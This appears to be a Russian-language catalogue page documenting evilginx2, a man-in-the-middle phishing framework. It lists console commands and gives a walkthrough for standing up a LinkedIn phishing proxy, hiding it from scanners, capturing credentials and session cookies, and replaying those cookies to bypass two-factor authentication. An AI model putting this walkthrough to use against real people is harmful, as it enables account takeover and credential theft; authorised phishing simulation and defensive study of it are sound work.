evilginx2
Описание evilginx2
evilginx2 — это платформа для атаки человек-посередине для кражи учётных данных (логина и пароля) путём фишинга, умеет перехватывать кукиз сеанса, которые, в свою очередь, позволяют обойти защиту двухфакторной аутентификацией.
Этот инструмент является преемником Evilginx, выпущенного в 2017, который использует специально настроенную версию HTTP сервера nginx для обеспечения функциональности человек-посередине, чтобы действовать как прокси между браузером и фишинговым сайтом. Настоящая версия полностью написана на GO и является самостоятельным приложением, который реализуют свой собственный HTTP и DNS сервер, делая процесс установки и использования крайне простым.
Домашняя страница: https://github.com/kgretzky/evilginx2
Автор: Kuba Gretzky
Лицензия: GPLv3
Справка по evilginx2
Использование:
./evilginx
Опции:
-debug Включить вывод отладочной информации -developer Включить режим разработчика (генерирует самоподписанные сертификаты для всех имён хостов) -p строка Путь до директории с фишлетами
На самом деле управление программой выполняется в интерактивной консоли.
Руководство по evilginx2
Страница man отсутствует.
Следующие команды используются в интерактивной консоли программы:
config : управление основной конфигурацией phishlets : управление конфигурацией фишлетов sessions : управление сессиями и захваченными токенами (маркерами) с учётными данными lures : управление приманками для генерации фишинговых url clear : очистка экрана
config
Показывает значения всех переменных конфигурации и позволяет из изменять.
config : показывает все переменные конфигурации config domain <домен> : установить базовый домен для всех фишлетов (например, evilsite.com) config ip <ip_адрес> : устанавливает IP адрес ткущего сервера config redirect_key <имя> : меняет имя параметра перенаправления в фишинговом url (фишинговые url нужно будет пересоздать) config verification_key <имя> : изменяет имя параметра верификации в фишинговом url (фишинговые url нужно будет пересоздать) config verification_token <токен> : меняет значение маркера верификации (фишинговые url нужно будет пересоздать) config redirect_url <url> : изменить url куда будут перенаправляться все неавторизованные запросы (фишинговые url нужно будет пересоздать)
phishlets
Показывает статус всех доступных фишлетов и позволяет изменить их параметры и включить их.
phishlets : показать статус всех доступных фишлетов phishlets hostname <фишлет> <имя_хоста> : установить имя хоста для данного шифлета (например, this.is.not.a.phishing.site.evilsite.com) phishlets enable <фишлет> : включить фишлет и если нужно запросить ssl/tls сертификат phishlets disable <фишлет> : отключить фишлет phishlets hide <фишлет> : спрятать фишинговую страницу, вести журнал и перенаправлять все запросы, пришедшие к ней (полезно для избежания сканеров во время рассылки фишинговых ссылок) phishlets unhide <фишлет> : делает фишинговую страницу доступный из вне phishlets get-url <фишлет> <url_для_перенаправления> : генерирует фишинговый url с перенаправлением при успешной аутентификации phishlets get-hosts <фишлет> : делает в файл hosts записи, для использования в тестировании localhost
sessions
Показывает все захваченные учётные данные и токены аутентификации. Позволяет просматривать полную историю визитов и удалять сессии входа.
sessions : показывает историю всех записанных визитов и захваченных учётных данных sessions <id> : показывает подробности по сессии, включая захваченные токены аутентификации, если они есть sessions delete <id> : удаляет сессию входа имеющую <id> (разрешены диапазоны через разделитель 1-7,10-12,15-25) sessions delete all : удалить все сессии входа
lures
Показывает все созданные приманки и позволяет редактировать или удалять их.
lures : показывает все созданные применки lures <id> : показывает подробности по приманке с заданным <id> lures create <фишлет> : creates new lure for given <фишлет> lures delete <id> : удаляет приманку с заданным <id> lures delete all : удаляет все созданные приманки lures edit path <id> <путь> : устанавливает пользовательский url <путь> для приманки с заданным <id> lures edit redirect_url <id> <url_редиректа> : устанавливает url редиректа, куда пользователь будет перенаправлен при успешной авторизации для приманки с заданным <id> lures edit phishlet <id> <фишлет> : изменить фишлет, применяется к приманке с заданным <id> lures edit info <id> <информация> : установить определённое описание для приманки с заданным <id> (только для напоминания) lures edit og_title <id> <заголовок> : установить заголовок opengraph, который будет показан по превью ссылки для приманки с заданным <id> lures edit og_desc <id> <заголовок> : установить описание opengraph которое будет показано по превью ссылки для приманки с заданным <id> lures edit og_image <id> <заголовок> : установить url изображения opengraph которое будет показано по превью ссылки для приманки с заданным <id> lures edit og_url <id> <заголовок> : установить url для opengraph которая будет показана по превью ссылки для приманки с заданным <id> lures edit params <id> <ключ=значение> : добавить, отредактировать или удалить пользовательские параметры (используется при внедрении javascript) для приманки с заданным <id>
Примеры запуска evilginx2
Чтобы всё заработало как надо, вам нужно сделать предварительную настройку.
На этом этапе подразумевается, что вы зарегистрировали доменное имя (допустим это yourdomain.com) и настроили Сервера Имён (nameservers, NS), оба ns1 и ns2 в панели управления вашего хостинг провайдера (или провайдера услуг по регистрации доменов) чтобы сервера имён указывали на IP адрес вашего сервера (допустим, это 10.0.0.1):
ns1.yourdomain.com = 10.0.0.1 ns2.yourdomain.com = 10.0.0.1
Далее уже в evilginx2 установить ваш домен и IP сервера следующими командами:
config domain yourdomain.com config ip 10.0.0.1
Теперь можно выбрать фишлет, который вы хотите использовать. Для этого короткого руководства мы будем использовать фишлет LinkedIn. Установим имя хоста для данного фишлета (очевидно, что он должен содержать ваш домен):
phishlets hostname linkedin my.phishing.hostname.yourdomain.com
И теперь вы можете включить фишлет, который инициирует автоматическое получение сертификатов SSL/TLS если они не найдены локально для имени хоста, которое вы выбрали:
phishlets enable linkedin
Теперь ваш фишинговый сайт онлайн. Подумайте об URL, куда должна быть перенаправлена жертва в случае успешного входа и установите его так (жертва будет перенаправлена на https://www.google.com):
phishlets get-url linkedin https://www.google.com
Запущенные фишлеты будут отвечать только на ссылки с токенами, это сделана для того, чтобы сканеры, веб обходчики и боты не видели вашу фишинговую страницу, вместо этого они будут перенаправлены на адрес, установленный в redirect_url. Если вы хотите спрятать ваш фишлет и сделать так, чтобы он не отвечал даже на запрос URL с правильным токеном, то используйте команду hide/unhide <phishlet>.
Вы можете мониторить захваченные учётные данные и кукиз сессии командой:
sessions
Для получения детальной информации о захваченной сессии, с самими сессионными куки, используйте команду с указанием идентификатора сессии (куки будут напечатаны внизу в формате JSON):
sessions <id>
Захваченные кукиз могут быть скопированы и импортированы в браузер Chrome используя расширение EditThisCookie.
Важно: если вы хотите, чтобы evilginx2 продолжал работать и после того, как вы вышли с вашего сервера, то эту программу нужно запускать внутри сессии screen.
Установка evilginx2
Установка в Kali Linux
Установка из скомпилированных файлов (более простая, но может быть установлена не самая последняя версия):
wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1` unzip evilginx_linux.zip -d evilginx rm evilginx_linux.zip cd evilginx/ chmod 700 ./evilginx sudo ./evilginx
Установка из исходного кода (будет установлена самая последняя версия):
Перейдите на страницу «Установка Go (компилятора и инструментов) в Linux» и следуйте инструкциям из раздела «Ручная установка самой последней версии компилятора Go».
Затем выполните следующие команды:
sudo apt install git make go get -u github.com/kgretzky/evilginx2 cd $GOPATH/src/github.com/kgretzky/evilginx2 make sudo make install
Запуск:
sudo evilginx
Установка в BlackArch
Установка из скомпилированных файлов (более простая, но может быть установлена не самая последняя версия):
wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1` unzip evilginx_linux.zip -d evilginx rm evilginx_linux.zip cd evilginx/ chmod 700 ./evilginx sudo ./evilginx
Установка из исходного кода (будет установлена самая последняя версия):
Перейдите на страницу «Установка Go (компилятора и инструментов) в Linux» и следуйте инструкциям из раздела «Ручная установка самой последней версии компилятора Go».
Затем выполните следующие команды:
sudo pacman -S git make go get -u github.com/kgretzky/evilginx2 cd $GOPATH/src/github.com/kgretzky/evilginx2 make sudo make install
Запуск:
sudo evilginx
Информация об установке в другие операционные системы будет добавлена позже.
Скриншоты evilginx2
Инструкции по evilginx2
- Кража паролей и обход двухфакторной аутентификации с evilginx2
- VPS для тренировки (РУ)
- VPS для тренировки (digitalocean)
Comments are Closed